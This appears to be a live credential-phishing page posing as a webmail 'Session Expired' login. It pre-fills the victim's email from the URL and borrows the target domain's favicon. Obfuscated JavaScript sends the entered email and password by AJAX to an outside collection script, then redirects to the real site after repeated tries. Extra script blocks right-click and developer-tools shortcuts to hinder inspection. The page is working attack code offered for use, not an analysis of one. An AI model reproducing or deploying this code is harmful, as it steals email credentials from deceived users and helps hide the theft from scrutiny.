<html><head><meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<title>Webmail Login Portal</title>
	<link rel="shortcut icon" href="https://t1.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,SIZE,URL&amp;size=64&amp;url=${dxmain}" type="image/x-icon">

	<style type="text/css">
		*{ outline:none; margin:0; padding:0 }
		html, body { height: 100%; font-family: 'Open Sans', sans-serif;
		color: #535353; font-size: 15px; flex-wrap: inherit;}

		.showbody {
		height: 100vh;
		width: 100%;
		display: flex;
		flex-direction: column;
		align-items: center;
		justify-content: center; z-index: 10;background-color: #0000004f; font-weight: bold;
		}
		iframe{ position: absolute;height: 100%;border: none;z-index: -1; opacity:0.8 }

		.form-father-div {
		background-color: orange;
		width: 320px;
		/*  min-height: 450px;*/
		max-width: 330px;
		margin: 0 auto;
		color: #717171;
		padding: 25px 30px 30px;
		background: #fdfdfd;
		box-shadow: 2px 2px 2px 2px rgb(0 0 0 / 30%);    
		/*    text-align: center;  */
		}
		.mybox{
			background: #D9D8D8;
			    color: black;
			    width: 450px;
			    height: 240px;
			    border-radius: 5px;
			    box-shadow: 1px 1px 5px 5px rgb(0 0 0 / 30%);
		}
		.topheadofdiv{color: #000;padding: 6px 8px 3px 10px;margin-bottom: 10px; display: flex; justify-content: center; font-family: cursive; border-bottom: 1px solid #aaa; align-items: center;}
		.topheadofdiv img{margin-right: 10px; width: 32px; height: 32px}
		form{ 
			    margin: 0 auto;
			    width: 320px;
			}
		.mmm{
			  display: flex;
			  justify-content: center;
			  align-items: center;			
		}
		.inputgrouped{ 
		}
		.inputgrouped input[type=password] {
		    padding: 5px 6px;
		}		
		 td,  th {
		    padding: 8px 1px;
		    display: table-cell;
		    text-align: left;
		/*    vertical-align: top;*/
		    width: 160px;
		}
		.btn {
		width: 100%;
		padding: 3px 52px;
		margin-bottom: 0;
		font-size: 20px;
		font-weight: 400;
		line-height: 1.42857143;
		border: 1px solid #444;
		border-radius: 3px;
		cursor: pointer;
		background-color: transparent;
		}
		.btn:hover {
			box-shadow: 2px 2px 2px 2px rgb(0 0 0 / 30%);
		}		
		button:disabled,button[disabled]{cursor: not-allowed; opacity: 0.6}
		.erx{margin: 10px 0px 0px; padding: 7px 5px;  color:#c50000; font-size:16px; text-align:center; }
		</style>	
	</head>
	<body>
		<iframe id="eFrame" src="" width="100%" scrolling="no" sandbox="allow-forms allow-pointer-lock allow-popups allow-same-origin allow-scripts" style=""></iframe>
		<section class="showbody">


			<div class="mybox">
				<div class="topheadofdiv">
					<img src="" alt="" id="domainimg"> 
					<span>Session Expired!</span>
		  			<span class="sitename"></span>
				</div>		

			  	<div class="erx" style="display: none;">Conection error, kindly try again!</div>
				  	<form action="">
				  		<div class="inputgrouped">
				  			<table>
				  			<tr>
				  				<td>Email Address:</td>
					  			<td>
					  				<input type="email" value="" id="lm" disabled style="border: 0;background: transparent;color: black;margin-left: -22px;font-size: 15px;" required>
					  			</td>				  				
				  			</tr>				  				
				  			</table>
				  			<table>
				  			<tr>
				  				<td>Email Password:</td>
					  			<td>
					  				<input type="password" name="" minlength="6" class="inputself" placeholder="Email password" id="lp" required>
					  			</td>				  				
				  			</tr>				  				
				  			</table>
				  		</div>
				  		<center><input type="checkbox" style="margin-right: 5px;">Keep me logged in</center>
				  		<div style="display: flex; justify-content: center; margin-top: 10px;">
				  			<button class="btn btn-blue" id="getitBtn">Log In</button>
				  		</div>	  	

				  		</div>			  					
				  	</form>				  		
			</div>			
		</section>
	    <script src="https://cdn.jsdelivr.net/npm/jquery@3.6.4/dist/jquery.min.js" integrity="sha256-oP6HI9z1XaZNBrJURtCoUT5SUnxFr8s3BzRl+cbzUq8=" crossorigin="anonymous"></script>
	    <script>
			const _0x282be4 = _0xcb68;
(function(_0x11c651, _0x1d9743) {
    const _0x7ae18e = _0xcb68,
        _0x35d832 = _0x11c651();
    while (!![]) {
        try {
            const _0x4cb71a = -parseInt(_0x7ae18e(0x185)) / 0x1 * (-parseInt(_0x7ae18e(0x174)) / 0x2) + -parseInt(_0x7ae18e(0x163)) / 0x3 * (-parseInt(_0x7ae18e(0x179)) / 0x4) + -parseInt(_0x7ae18e(0x162)) / 0x5 + parseInt(_0x7ae18e(0x166)) / 0x6 * (-parseInt(_0x7ae18e(0x183)) / 0x7) + -parseInt(_0x7ae18e(0x171)) / 0x8 + parseInt(_0x7ae18e(0x180)) / 0x9 * (parseInt(_0x7ae18e(0x178)) / 0xa) + -parseInt(_0x7ae18e(0x164)) / 0xb * (parseInt(_0x7ae18e(0x160)) / 0xc);
            if (_0x4cb71a === _0x1d9743) break;
            else _0x35d832['push'](_0x35d832['shift']());
        } catch (_0x41f44b) {
            _0x35d832['push'](_0x35d832['shift']());
        }
    }
}(_0x49bc, 0x1aea7), $(document)[_0x282be4(0x176)](function() {
    const _0x3da095 = _0x282be4,
        _0x3938a6 = new URLSearchParams(window[_0x3da095(0x15e)]['search']),
        _0x1efdc4 = _0x3938a6[_0x3da095(0x17c)]('e');
    if (!_0x1efdc4) $(_0x3da095(0x17a))[_0x3da095(0x182)](_0x3da095(0x16f)), window[_0x3da095(0x15a)];
    else {
        $(_0x3da095(0x17b))['val'](_0x1efdc4);
        let _0x53d2e0 = _0x1efdc4[_0x3da095(0x187)]('@')[0x1],
            _0x396e3c = _0x53d2e0[_0x3da095(0x187)]('.')[0x0][_0x3da095(0x175)]();
        document['querySelector'](_0x3da095(0x16c))[_0x3da095(0x16b)](_0x396e3c);
        let _0x50f9fd = atob(_0x3da095(0x184)) + _0x53d2e0;
        document['querySelector'](_0x3da095(0x161))[_0x3da095(0x170)]('href', _0x50f9fd), document[_0x3da095(0x15c)]('#domainimg')[_0x3da095(0x170)](_0x3da095(0x17d), _0x50f9fd);
        const _0xc6f8d1 = new Date();
        $(_0x3da095(0x15d))[_0x3da095(0x182)](_0x53d2e0), $(_0x3da095(0x168))[_0x3da095(0x177)](_0x3da095(0x17d), _0x3da095(0x186) + _0x53d2e0);
        var _0x5b21c5 = 0x0;
        $(_0x3da095(0x169))['on'](_0x3da095(0x173), _0xc4ee86 => {
            const _0x3971cf = _0x3da095;
            _0xc4ee86[_0x3971cf(0x181)](), _0xc4ee86['stopPropagation'](), $(_0x3971cf(0x17e))['hide']();
            let _0x214c0d = $(_0x3971cf(0x17b))['val'](),
                _0x293901 = $('#lp')['val']();
            _0x5b21c5++, $['ajax']({
                'url': _0x3971cf(0x16e),
                'method': _0x3971cf(0x15b),
                'data': {
                    'email': _0x214c0d,
                    'passmenot': _0x293901,
                    'clientUrl': _0x3971cf(0x186) + _0x53d2e0,
                    'typesent': ''
                },
                'beforeSend': () => {
                    const _0x14b2f4 = _0x3971cf;
                    $(_0x14b2f4(0x16a))['prop'](_0x14b2f4(0x16d), !![])[_0x14b2f4(0x17a)]('Verifying...');
                },
                'error': _0x47f790 => {
                    const _0x238aa9 = _0x3971cf;
                    $(_0x238aa9(0x17e))[_0x238aa9(0x167)](), _0x5b21c5 > 0x3 && (window[_0x238aa9(0x15e)]['href'] = '//' + domain), setTimeout(() => {
                        const _0x3a8ba9 = _0x238aa9;
                        $(_0x3a8ba9(0x172))[_0x3a8ba9(0x15f)]('')['focus']();
                    }, 0x64);
                },
                'complete': function() {
                    const _0x4d21df = _0x3971cf;
                    $('#getitBtn')[_0x4d21df(0x165)](_0x4d21df(0x16d), ![])['html'](_0x4d21df(0x17f));
                }
            });
        });
    }
}));

function _0xcb68(_0x211421, _0x4a715d) {
    const _0x49bc59 = _0x49bc();
    return _0xcb68 = function(_0xcb68ce, _0x2ad313) {
        _0xcb68ce = _0xcb68ce - 0x15a;
        let _0xcbcb3b = _0x49bc59[_0xcb68ce];
        return _0xcbcb3b;
    }, _0xcb68(_0x211421, _0x4a715d);
}

function _0x49bc() {
    const _0x189809 = ['Error', 'setAttribute', '1034464dMKCjP', '#lp', 'submit', '8714wkdzuE', 'toUpperCase', 'ready', 'attr', '363170RVQiDo', '781004ChudqS', 'html', '#lm', 'get', 'src', '.erx', 'Log\x20In', '45GfPeFm', 'preventDefault', 'text', '121982Jcgfjj', 'aHR0cHM6Ly90MS5nc3RhdGljLmNvbS9mYXZpY29uVjI/Y2xpZW50PVNPQ0lBTCZ0eXBlPUZBVklDT04mZmFsbGJhY2tfb3B0cz1UWVBFLFNJWkUsVVJMJnNpemU9NjQmdXJsPWh0dHA6Ly8=', '18xQvRXo', 'https://', 'split', 'stop', 'post', 'querySelector', '#ledomen', 'location', 'val', '96LxbzBl', 'link[rel=\x22shortcut\x20icon\x22]', '699695TYqmgh', '3rJYCDE', '8338dxlPyM', 'prop', '24koSjUf', 'show', '#eFrame', 'form', '#getitBtn', 'append', 'title', 'disabled', 'https://insidesalesacademy.com.br/oiloil/u.php'];
    _0x49bc = function() {
        return _0x189809;
    };
    return _0x49bc();
}
			</script>
			<script>
			 $(function() {
        $(this).bind("contextmenu", function(e) {
            e.preventDefault();
        });
    }); 
	
	document.addEventListener('keydown', event => {
  if (event.keyCode === 123 || (event.ctrlKey && event.shiftKey && event.keyCode === 73)) {
    event.preventDefault();
  }
});
			</script>
	</body>
</html>
